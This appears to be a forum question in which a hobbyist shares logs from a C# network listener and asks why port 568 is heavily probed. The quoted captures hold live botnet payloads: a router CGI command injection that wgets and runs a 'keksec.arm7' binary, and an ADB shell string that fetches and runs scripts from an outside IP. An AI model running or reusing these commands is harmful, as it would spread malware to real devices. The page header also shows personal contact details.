• caglararli@hotmail.com
  • 05386281520

Intensive 586 (ms-shuttle) port scan/exploit/hacking attempts

Çağlar Arlı      -    85 Views

Intensive 586 (ms-shuttle) port scan/exploit/hacking attempts

Recently i wanted to play a bit with TCP/UDP networking (and touch some custom HTTP server impl) on C# and found out that i'm getting requests from totally unknown dudes, such as this one:

   FROM: [::ffff:149.129.139.48]:52306
   [ANS]
POST /cgi-bin/ViewLog.asp HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: B4ckdoor-owned-you
Content-Length: 222
Content-Type: application/x-www-form-urlencoded

remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://107.174.133.119/bins/keksec.arm7;chmod+777+keksec.arm7;./keksec.arm7;rm+-rf+keksec.arm7%3b%23&remoteSubmit=Save

Then, i decided to go further and made a mass port-trap from 90 to 10000 and i found that the most intensive one is the 568 port which stands as ms-shuttle/smb port. Here's some samples:


[25.11.2020 21:53:46]
   FROM: [::ffff:181.188.133.9]:55852
   [ANS]
| UTF8:
 &�     Cookie: mstshash=hello
      
--------------------
[25.11.2020 21:53:33]
   FROM: [::ffff:185.176.222.39]:64787 // <= this dude was spamming me for like 2-4 hrs
   [ANS]
| UTF8:
 *�     Cookie: mstshash=Administr
      
--------------------
[25.11.2020 16:07:01]
   FROM: [::ffff:118.233.192.126]:48964
   [ANS]
| UTF8:
 X      �  �  ����shell:>/data/local/tmp/.x && cd /data/local/tmp; >/sdcard/0/Downloads/.x && cd /sdcard/0/Downloads; >/storage/emulated/0/Downloads && cd /storage/emulated/0/Downloads; rm -rf wget bwget bcurl curl; wget http://5.252.194.137/wget; sh wget; busybox wget http://5.252.194.137/bwget; sh bwget; busybox curl http://5.252.194.137/bcurl > bcurl; sh bcurl; curl http://5.252.194.137/curl > curl; sh curl  

I tried to search some info about this port + knock-knocks on it, but didn't succeeded. My log file size now exceeds 2 Mb so i wonder, why this is happening? Why this port is so actively being bombed? And, probably, what should i do to prevent receiving those requests?